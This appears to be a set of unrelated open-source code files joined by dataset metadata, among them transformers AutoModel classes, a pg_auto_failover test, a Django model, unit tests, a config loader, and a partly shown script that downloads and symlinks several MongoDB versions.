", ".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),
)
)
class AutoModelForQuestionAnswering:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
question answering head---when created with the when created with the
:meth:`~transformers.AutoModeForQuestionAnswering.from_pretrained` class method or the
:meth:`~transformers.AutoModelForQuestionAnswering.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForQuestionAnswering is designed to be instantiated "
"using the `AutoModelForQuestionAnswering.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForQuestionAnswering.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_QUESTION_ANSWERING_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a question answering head---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForQuestionAnswering.from_pretrained` to load the
model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForQuestionAnswering
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForQuestionAnswering.from_config(config)
"""
if type(config) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys():
return MODEL_FOR_QUESTION_ANSWERING_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_QUESTION_ANSWERING_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a question answering head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForQuestionAnswering
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForQuestionAnswering.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys():
return MODEL_FOR_QUESTION_ANSWERING_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys()),
)
)
class AutoModelForTokenClassification:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a token
classification head---when created with the when created with the
:meth:`~transformers.AutoModelForTokenClassification.from_pretrained` class method or the
:meth:`~transformers.AutoModelForTokenClassification.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForTokenClassification is designed to be instantiated "
"using the `AutoModelForTokenClassification.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForTokenClassification.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a token classification head---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForTokenClassification.from_pretrained` to load
the model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForTokenClassification
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForTokenClassification.from_config(config)
"""
if type(config) in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys():
return MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a token classification head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForTokenClassification
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForTokenClassification.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForTokenClassification.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForTokenClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys():
return MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys()),
)
)
class AutoModelForMultipleChoice:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
multiple choice classification head---when created with the when created with the
:meth:`~transformers.AutoModelForMultipleChoice.from_pretrained` class method or the
:meth:`~transformers.AutoModelForMultipleChoice.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForMultipleChoice is designed to be instantiated "
"using the `AutoModelForMultipleChoice.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForMultipleChoice.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_MULTIPLE_CHOICE_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a multiple choice classification head---from a
configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForMultipleChoice.from_pretrained` to load the
model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForMultipleChoice
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForMultipleChoice.from_config(config)
"""
if type(config) in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys():
return MODEL_FOR_MULTIPLE_CHOICE_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_MULTIPLE_CHOICE_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a multiple choice classification head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForMultipleChoice
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForMultipleChoice.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForMultipleChoice.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForMultipleChoice.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys():
return MODEL_FOR_MULTIPLE_CHOICE_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys()),
)
)
class AutoModelForNextSentencePrediction:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
multiple choice classification head---when created with the when created with the
:meth:`~transformers.AutoModelForNextSentencePrediction.from_pretrained` class method or the
:meth:`~transformers.AutoModelForNextSentencePrediction.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForNextSentencePrediction is designed to be instantiated "
"using the `AutoModelForNextSentencePrediction.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForNextSentencePrediction.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a multiple choice classification head---from a
configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForNextSentencePrediction.from_pretrained` to load
the model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForNextSentencePrediction
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForNextSentencePrediction.from_config(config)
"""
if type(config) in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys():
return MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a multiple choice classification head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForNextSentencePrediction
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForNextSentencePrediction.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForNextSentencePrediction.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForNextSentencePrediction.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys():
return MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys()),
)
)
| 44.597458
| 147
| 0.680122
|
4a0a25c94a0cd026d1780c79edf7777d2cdbd6aa
| 327
|
py
|
Python
|
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | null | null | null |
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | 1
|
2019-11-07T06:02:20.000Z
|
2019-11-07T06:02:20.000Z
|
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | 1
|
2019-11-07T06:04:44.000Z
|
2019-11-07T06:04:44.000Z
|
from setuptools import setup
setup(name='data_skew',
version='0.1.1',
description='Create DataFrames based on a required bias',
url='http://github.com/JVoogt/data-skew',
author='J Voogt',
author_email='jvoogt1@outlook.com',
license='MIT',
packages=['data_skew'],
zip_safe=False)
| 29.727273
| 63
| 0.64526
|
4a0a26615c315c56b24f9b391a3eed2287cf2652
| 2,424
|
py
|
Python
|
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
import pgautofailover_utils as pgautofailover
from nose.tools import *
import time
cluster = None
monitor = None
node1 = None
node2 = None
def setup_module():
global cluster
cluster = pgautofailover.Cluster()
def teardown_module():
cluster.destroy()
def test_000_create_monitor():
global monitor
monitor = cluster.create_monitor("/tmp/multi_standby/monitor")
monitor.run()
monitor.wait_until_pg_is_running()
def test_001_init_primary():
global node1
node1 = cluster.create_datanode("/tmp/multi_standby/node1")
node1.create()
node1.run()
assert node1.wait_until_state(target_state="single")
def test_002_candidate_priority():
assert node1.get_candidate_priority() == 100
assert not node1.set_candidate_priority(-1)
assert node1.get_candidate_priority() == 100
assert node1.set_candidate_priority(99)
assert node1.get_candidate_priority() == 99
def test_003_replication_quorum():
assert node1.get_replication_quorum()
assert not node1.set_replication_quorum("wrong quorum")
assert node1.get_replication_quorum()
assert node1.set_replication_quorum("false")
assert not node1.get_replication_quorum()
assert node1.set_replication_quorum("true")
assert node1.get_replication_quorum()
def test_004_add_standby():
# the next test wants to set number_sync_standbys to 2
# so we need at least 3 standbys to allow that
global node2
node2 = cluster.create_datanode("/tmp/multi_standby/node2")
node2.create()
node2.run()
assert node2.wait_until_state(target_state="secondary")
assert node1.wait_until_state(target_state="primary")
def test_005_number_sync_standbys():
print()
assert node1.get_number_sync_standbys() == 1
assert not node1.set_number_sync_standbys(-1)
assert node1.get_number_sync_standbys() == 1
assert not node1.set_number_sync_standbys(2)
assert node1.get_number_sync_standbys() == 1
print("set number_sync_standbys = 0")
assert node1.set_number_sync_standbys(0)
assert node1.get_number_sync_standbys() == 0
print("synchronous_standby_names = '%s'" %
node1.get_synchronous_standby_names())
print("set number_sync_standbys = 1")
assert node1.set_number_sync_standbys(1)
assert node1.get_number_sync_standbys() == 1
print("synchronous_standby_names = '%s'" %
node1.get_synchronous_standby_names())
| 29.560976
| 66
| 0.743399
|
4a0a2677c3ab0402a1a40cdc665b805385914010
| 890
|
py
|
Python
|
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from substrapp.utils import get_hash
def upload_to(instance, filename):
return 'algos/{0}/{1}'.format(instance.pk, filename)
class Algo(models.Model):
"""Storage Data table"""
pkhash = models.CharField(primary_key=True, max_length=64, blank=True)
file = models.FileField(upload_to=upload_to, max_length=500) # path max length to 500 instead of default 100
description = models.FileField(upload_to=upload_to, max_length=500) # path max length to 500 instead of default 100
validated = models.BooleanField(default=False)
def save(self, *args, **kwargs):
"""Use hash of file as primary key"""
if not self.pkhash:
self.pkhash = get_hash(self.file)
super(Algo, self).save(*args, **kwargs)
def __str__(self):
return f"Algo with pkhash {self.pkhash} with validated {self.validated}"
| 35.6
| 120
| 0.695506
|
4a0a26dc72683f331443908321acfa3588b8594f
| 1,933
|
py
|
Python
|
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | 4
|
2017-06-07T18:42:05.000Z
|
2020-03-05T07:56:12.000Z
|
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | null | null | null |
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | null | null | null |
import unittest
import stringManipulation
from stringManipulation import *
class TestSplitIntoWords(unittest.TestCase):
def testGeneric(self):
testStr = "The quick brown fox jumps over the lazy dog."
splitStr = ["The", "quick", "brown", "fox", "jumps", "over", "the", "lazy", "dog."]
self.assertEqual(stringManipulation.SplitIntoWords(testStr), splitStr)
class TestRemoveUppercase(unittest.TestCase):
def testFirstLetter(self):
self.assertEqual(stringManipulation.RemoveUppercase("Word"), "word")
def testLastLetter(self):
self.assertEqual(stringManipulation.RemoveUppercase("worD"), "word")
def testNoLetters(self):
self.assertEqual(stringManipulation.RemoveUppercase("word"), "word")
def testAllLetters(self):
self.assertEqual(stringManipulation.RemoveUppercase("WORD"), "word")
class TestRemovePunctuation(unittest.TestCase):
def testNoPunctuation(self):
self.assertEqual(stringManipulation.RemovePunctuation("marten"), "marten")
def testFirstCharPunctuation(self):
self.assertEqual(stringManipulation.RemovePunctuation("(marten"), "marten")
def testLastCharPunctaution(self):
self.assertEqual(stringManipulation.RemovePunctuation("marten."), "marten")
def testFirstAndLastCharPunctuation(self):
self.assertEqual(stringManipulation.RemovePunctuation("(marten)"), "marten")
class TestCharAtPosIsPunctuationChar(unittest.TestCase):
punctuationChars = ['(', '{', '[', ')', '}', ']', '.', ',', '?', '!', '*']
def testEmptyString(self):
self.assertFalse(CharAtPosIsPunctuationChar("", 0))
def testPunctationChar(self):
for char in self.punctuationChars:
string = "wo" + char + "rd"
self.assertTrue(CharAtPosIsPunctuationChar(string, 2))
def testNoPunctuationChar(self):
self.assertFalse(CharAtPosIsPunctuationChar("nopunctuation", 5))
| 39.44898
| 91
| 0.70357
|
4a0a26e607527bf69974fb2567325de93cb158c0
| 1,371
|
py
|
Python
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 14
|
2019-06-26T18:43:09.000Z
|
2022-03-12T00:53:42.000Z
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 10
|
2020-03-01T15:21:23.000Z
|
2021-09-01T15:28:37.000Z
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 6
|
2019-03-01T15:25:24.000Z
|
2022-03-30T10:26:33.000Z
|
"""
Handle the Json configuration file
At the moment it is only used for the LargeFileStorage
"""
import json
import logging
from os.path import dirname, exists, expanduser, join
logger = logging.getLogger(__name__)
def _requires_load(func):
def func_new(self, *args, **kwargs):
if self._cfg is None:
self.load()
return func(self, *args, **kwargs)
return func_new
class Config:
def __init__(self, fname="~/.sme/config.json"):
self.filename = fname
self._cfg = None
if not exists(self.filename):
logger.info(
f"No cconfiguration file found at {self.filename}, using default values instead"
)
self.filename = join(dirname(__file__), "config_default.json")
@property
def filename(self):
return str(self._filename)
@filename.setter
def filename(self, value):
self._filename = expanduser(value)
@_requires_load
def __getitem__(self, key):
return self._cfg[key]
@_requires_load
def __setitem__(self, key, value):
self._cfg[key] = value
def load(self):
with open(self._filename, "r") as f:
self._cfg = json.load(f)
return self._cfg
@_requires_load
def save(self):
with open(self._filename, "w") as f:
json.dump(self._cfg, f)
| 24.052632
| 96
| 0.618527
|
4a0a26f9cdb035799d8ba839e2a66ff7f7a4f685
| 14,674
|
py
|
Python
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 12
|
2020-04-27T21:31:57.000Z
|
2020-12-13T13:25:06.000Z
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:01:11.000Z
|
2021-03-26T00:02:19.000Z
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 4
|
2021-03-27T14:40:25.000Z
|
2022-03-19T20:52:41.000Z
|
#!/usr/bin/env python
import re
import sys
import os
import tempfile
import subprocess
import json
import urlparse
import tarfile
import signal
import threading
import traceback
import shutil
import errno
from contextlib import closing
# To ensure it exists on the system
import zipfile
#
# Useful script for installing multiple versions of MongoDB on a machine
# Only really tested/works on Linux.
#
def dump_stacks(signal, frame):
print "======================================"
print "DUMPING STACKS due to SIGUSR1 signal"
print "======================================"
threads = threading.enumerate()
print "Total Threads: " + str(len(threads))
for id, stack in sys._current_frames().items():
print "Thread %d" % (id)
print "".join(traceback.format_stack(stack))
print "======================================"
def get_version_parts(version, for_sorting=False):
"""Returns a list containing the components of the version string
as numeric values. This function can be used for numeric sorting
of version strings such as '2.6.0-rc1' and '2.4.0' when the
'for_sorting' parameter is specified as true."""
RC_OFFSET = -100
version_parts = re.split(r'\.|-', version)
if version_parts[-1] == "pre":
# Prior to improvements for how the version string is managed within the server
# (SERVER-17782), the binary archives would contain a trailing "-pre".
version_parts.pop()
if version_parts[-1].startswith("rc"):
# RC versions are weighted down to allow future RCs and general
# releases to be sorted in ascending order (e.g., 2.6.0-rc1,
# 2.6.0-rc2, 2.6.0).
version_parts[-1] = int(version_parts[-1][2:]) + RC_OFFSET
elif version_parts[0].startswith("v") and version_parts[-1] == "latest":
version_parts[0] = version_parts[0][1:]
# The "<branchname>-latest" versions are weighted the highest when a particular major
# release is requested.
version_parts[-1] = float("inf")
elif for_sorting:
# We want to have the number of components in the resulting version parts match the number
# of components in the 'version' string if we aren't going to be using them for sorting.
# Otherwise, we append an additional 0 to non-RC releases so that version lists like
# [2, 6, 0, -100] and [2, 6, 0, 0] sort in ascending order.
version_parts.append(0)
return [float(part) for part in version_parts]
def download_file(url, file_name):
"""Returns True if download was successful. Raises error if download fails."""
proc = subprocess.Popen(["curl",
"-L", "--silent",
"--retry", "5",
"--retry-max-time", "600",
"--max-time", "120",
"-o", file_name,
url],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc.communicate()
error_code = proc.returncode
if not error_code:
error_code = proc.wait()
if not error_code:
return True
raise Exception("Failed to download %s with error %d" % (url, error_code))
class MultiVersionDownloader:
def __init__(self, install_dir, link_dir, edition, platform_arch, generic_arch='Linux/x86_64'):
self.install_dir = install_dir
self.link_dir = link_dir
self.edition = edition.lower()
self.platform_arch = platform_arch.lower().replace('/', '_')
self.generic_arch = generic_arch.lower().replace('/', '_')
self._links = None
self._generic_links = None
@property
def generic_links(self):
if self._generic_links is None:
self._links, self._generic_links = self.download_links()
return self._generic_links
@property
def links(self):
if self._links is None:
self._links, self._generic_links = self.download_links()
return self._links
def download_links(self):
temp_file = tempfile.mktemp()
download_file("https://downloads.mongodb.org/full.json", temp_file)
with open(temp_file) as f:
full_json = json.load(f)
os.remove(temp_file)
if 'versions' not in full_json:
raise Exception("No versions field in JSON: \n" + str(full_json))
links = {}
generic_links = {}
for json_version in full_json['versions']:
if 'version' in json_version and 'downloads' in json_version:
version = json_version['version']
for download in json_version['downloads']:
if 'target' in download and 'edition' in download:
if download['target'].lower() == self.platform_arch and \
download['edition'].lower() == self.edition:
links[version] = download['archive']['url']
elif download['target'].lower() == self.generic_arch and \
download['edition'].lower() == 'base':
generic_links[version] = download['archive']['url']
return links, generic_links
def download_version(self, version):
try:
os.makedirs(self.install_dir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(self.install_dir):
pass
else: raise
urls = []
requested_version_parts = get_version_parts(version)
for link_version, link_url in self.links.iteritems():
link_version_parts = get_version_parts(link_version)
if link_version_parts[:len(requested_version_parts)] == requested_version_parts:
# The 'link_version' is a candidate for the requested 'version' if
# (a) it is a prefix of the requested version, or if
# (b) it is the "<branchname>-latest" version and the requested version is for a
# particular major release.
# This is equivalent to the 'link_version' having components equal to all of the
# version parts that make up 'version'.
if "-" in version:
# The requested 'version' contains a hyphen, so we only consider exact matches
# to that version.
if link_version != version:
continue
urls.append((link_version, link_url))
if len(urls) == 0:
print >> sys.stderr, ("Cannot find a link for version %s, versions %s found."
% (version, self.links))
for ver, generic_url in self.generic_links.iteritems():
parts = get_version_parts(ver)
if parts[:len(requested_version_parts)] == requested_version_parts:
if "-" in version and ver != version:
continue
urls.append((ver, generic_url))
if len(urls) == 0:
raise Exception(
"No fall-back generic link available or version %s." % version)
else:
print "Falling back to generic architecture."
urls.sort(key=lambda (version, _): get_version_parts(version, for_sorting=True))
full_version = urls[-1][0]
url = urls[-1][1]
extract_dir = url.split("/")[-1][:-4]
file_suffix = os.path.splitext(urlparse.urlparse(url).path)[1]
# only download if we don't already have the directory
already_downloaded = os.path.isdir(os.path.join( self.install_dir, extract_dir))
if already_downloaded:
print "Skipping download for version %s (%s) since the dest already exists '%s'" \
% (version, full_version, extract_dir)
else:
print "Downloading data for version %s (%s)..." % (version, full_version)
print "Download url is %s" % url
temp_dir = tempfile.mkdtemp()
temp_file = tempfile.mktemp(suffix=file_suffix)
download_file(url, temp_file)
print "Uncompressing data for version %s (%s)..." % (version, full_version)
first_file = ''
if file_suffix == ".zip":
# Support .zip downloads, used for Windows binaries.
with zipfile.ZipFile(temp_file) as zf:
# Use the name of the root directory in the archive as the name of the directory
# to extract the binaries into inside 'self.install_dir'. The name of the root
# directory nearly always matches the parsed URL text, with the exception of
# versions such as "v3.2-latest" that instead contain the githash.
first_file = zf.namelist()[0]
zf.extractall(temp_dir)
elif file_suffix == ".tgz":
# Support .tgz downloads, used for Linux binaries.
with closing(tarfile.open(temp_file, 'r:gz')) as tf:
# Use the name of the root directory in the archive as the name of the directory
# to extract the binaries into inside 'self.install_dir'. The name of the root
# directory nearly always matches the parsed URL text, with the exception of
# versions such as "v3.2-latest" that instead contain the githash.
first_file = tf.getnames()[0]
tf.extractall(path=temp_dir)
else:
raise Exception("Unsupported file extension %s" % file_suffix)
# Sometimes the zip will contain the root directory as the first file and
# os.path.dirname() will return ''.
extract_dir = os.path.dirname(first_file)
if not extract_dir:
extract_dir = first_file
temp_install_dir = os.path.join(temp_dir, extract_dir)
# We may not have been able to determine whether we already downloaded the requested
# version due to the ambiguity in the parsed URL text, so we check for it again using
# the adjusted 'extract_dir' value.
already_downloaded = os.path.isdir(os.path.join(self.install_dir, extract_dir))
if not already_downloaded:
shutil.move(temp_install_dir, self.install_dir)
shutil.rmtree(temp_dir)
os.remove(temp_file)
self.symlink_version(version, os.path.abspath(os.path.join(self.install_dir, extract_dir)))
def symlink_version(self, version, installed_dir):
try:
os.makedirs(self.link_dir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(self.link_dir):
pass
else: raise
for executable in os.listdir(os.path.join(installed_dir, "bin")):
executable_name, executable_extension = os.path.splitext(executable)
link_name = "%s-%s%s" % (executable_name, version, executable_extension)
try:
executable = os.path.join(installed_dir, "bin", executable)
executable_link = os.path.join(self.link_dir, link_name)
if os.name == "nt":
# os.symlink is not supported on Windows, use a direct method instead.
def symlink_ms(source, link_name):
import ctypes
csl = ctypes.windll.kernel32.CreateSymbolicLinkW
csl.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
csl.restype = ctypes.c_ubyte
flags = 1 if os.path.isdir(source) else 0
if csl(link_name, source.replace('/', '\\'), flags) == 0:
raise ctypes.WinError()
os.symlink = symlink_ms
os.symlink(executable, executable_link)
